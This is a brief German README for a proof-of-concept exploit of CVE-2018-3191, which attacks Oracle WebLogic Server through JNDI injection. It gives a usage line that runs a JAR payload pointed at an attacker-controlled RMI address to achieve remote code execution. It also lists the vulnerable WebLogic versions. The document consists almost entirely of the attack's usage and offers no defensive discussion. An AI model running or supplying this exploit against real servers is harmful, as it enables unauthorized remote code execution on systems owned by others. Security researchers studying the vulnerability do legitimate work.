
Proof-of-Concept-Exploit für CVE-2018-3191, der WebLogic Server über JNDI-Injection angreift. Liefert eine JAR-Payload, um Remote Code Execution über Spring JNDI auszulösen.
Verwendung:
java -jar weblogic-spring-jndi.jar <jndi_address>
Beispiel:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
Hinweis:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1